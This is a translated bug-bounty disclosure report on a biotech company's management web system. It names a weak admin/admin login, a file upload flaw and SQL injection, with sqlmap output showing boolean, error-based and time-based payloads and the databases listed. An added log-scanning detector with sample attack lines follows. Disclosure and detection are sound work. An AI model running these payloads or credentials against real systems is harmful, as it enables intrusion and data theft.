2015-12-21: Details sent to the vendor; awaiting the vendor's handling
2015-12-25: Vendor has confirmed; details disclosed only to the vendor
2016-01-04: Details disclosed to core white hats and experts in related fields
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public
As the title says.
Shenzhen Dakewe Biotech Co., Ltd. was founded in 1999. After more than ten years of rapid growth it has become a group enterprise headquartered in Shenzhen, with branches in more than ten cities including Beijing, Shanghai, Guangzhou, Chengdu, Wuhan and Hong Kong. It has over 200 employees, 90% of whom hold a bachelor's degree or higher. Its main business covers the two segments of BioScience and BioMedicine, including the R&D, production and marketing of scientific instruments and life science reagents, medical equipment and diagnostic reagents.
Target: **.**.**.**:8080/system/login.php
Credentials: admin/admin

01. Weak password
02. Arbitrary file upload
03. SQL injection
sqlmap identified the following injection points with a total of 248 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND 9730=9730 AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=&current_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND (SELECT 1642 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(1642=1642,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=&current_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value=

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))EuBE) AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=&current_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value=
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.17
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] mis2010
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    [duplicate of the three injection points listed above omitted]
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
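The sqlmap output above shows three payload families against the keyword parameter (boolean tautology closed with AND '%'=', an error-based FLOOR(RAND(0)*2) duplicate-key probe, and SLEEP-based timing). The following is an added detection example, not code from the report or the vendor: it scans constructed Apache access-log lines whose request shape mirrors the /system/index.php URI above and classifies each request by family, so an operator can spot this kind of probing in logs. The log lines, IP and timestamps are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the report). The keyword
# values are percent-encoded the way a client sends them on the wire.
SAMPLE_LOG = """
10.0.0.5 - - [21/Dec/2015:10:01:02 +0800] "GET /system/index.php?m=maintain&tab=mytask&keyword=pump HTTP/1.1" 200 5120
10.0.0.5 - - [21/Dec/2015:10:01:03 +0800] "GET /system/index.php?m=maintain&tab=mytask&keyword=1%25%27%20AND%209730%3D9730%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 5120
10.0.0.5 - - [21/Dec/2015:10:01:04 +0800] "GET /system/index.php?m=maintain&tab=mytask&keyword=1%25%27%20AND%20%28SELECT%201642%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71787a6271%2C%28SELECT%20%28ELT%281642%3D1642%2C1%29%29%29%2C0x71706a6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 500 311
10.0.0.5 - - [21/Dec/2015:10:01:10 +0800] "GET /system/index.php?m=maintain&tab=mytask&keyword=1%25%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29EuBE%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 5120
"""

# One signature per family seen in the sqlmap output above. They are
# applied to the URL-decoded URI, so encoding does not hide them.
SIGNATURES = {
    # quote-break, numeric tautology, then re-close the LIKE '%...%' pattern
    "boolean-based blind": re.compile(r"'\s*AND\s+\d+\s*=\s*\d+\s*AND\s*'%'\s*=\s*'", re.I),
    # duplicate-entry error trick used by MySQL error-based extraction
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # timing probe
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

# Apache common-log shape: client, identity, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(uri):
    """Return the list of payload families found in one request URI."""
    decoded = unquote_plus(uri)  # single decode pass; do not loop-decode
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(log_text):
    """Yield (ip, timestamp, status, families) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kinds = classify(m["uri"])
        if kinds:
            hits.append((m["ip"], m["ts"], m["status"], kinds))
    return hits

if __name__ == "__main__":
    for ip, ts, status, kinds in scan(SAMPLE_LOG):
        print(f"{ts} {ip} HTTP {status}: {', '.join(kinds)}")
```

A 500 response on the error-based probe, as in the third sample line, is itself a signal worth alerting on: it means the database error reached the application's output path.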
Stopping here; I did not go any deeper...
Fix it~~
Severity level: High
Vulnerability Rank: 10
Confirmation time: 2015-12-25 15:50
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: high. Attack cost: low. Impact caused: high. Overall rating: high, rank: 10. We are contacting the relevant website administration unit for handling.
None yet